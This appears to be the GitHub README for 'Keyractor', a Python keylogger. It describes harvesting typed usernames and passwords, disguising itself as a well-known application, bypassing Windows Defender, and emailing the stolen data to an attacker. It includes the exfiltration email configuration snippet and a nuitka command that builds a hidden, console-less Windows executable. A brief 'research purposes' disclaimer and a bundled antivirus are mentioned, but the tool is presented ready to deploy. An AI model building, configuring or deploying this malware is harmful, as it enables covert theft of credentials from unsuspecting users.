/Keyractor

keylogging application that can detect user input and extract suspected usernames and passwords then send them by email to the attacker.

Primary LanguageRoff

Keyractor

Keyractor is a keylogging application that can detect user input and extract suspected usernames and passwords then send them by email to the attacker. The app runs in the background and has the name and icon of a well-known application so normal users cannot distinguish it from the original one.

GitHub issues GitHub issues GitHub forks GitHub stars GitHub license

Ethical warning

  • This app is made for research purposes and we aren't responsible for any illegal usage
  • The app bypass windows defender antivirus so we developed an antivirus for the app that can be found in /antivirus/antivirus.py

Table of Contents

Installation

Dependencies

- python 3.6 or higher

📦 Libraries

- pynput

- pyperclip

can be installed using
    pip install [pakage-name] 

$ git clone https://github.com/AhmedZahran02/Keyractor.git
$ cd Keyractor

Usage

you need to insert an auxiliary email that will send the data and an attacker email that the data will be sent to

  def send_file(path):
  sender_email = ''        # aux email address
  sender_password = ''     # aux email password

  receiver_email = ''  # attacker email address
  subject = 'Target hecked successfully'
  message = "I'm a genius hecker."
  attachment_path = path     # path to key log file

Deployment

    python -m nuitka --mingw64 .\Keyractor.py --standalone --onefile --windows-disable-console
  • you need to copy rsa.exe to the output deployment folder from nutika

Contact

©️ Developers

Ahmed Abdelatty
Ahmed Zahran
MoAdelEzz
Mohamed Adel
Youssef Hagag
Youssef Hagag
AbdoWise-z
Abdulrahman Mohamed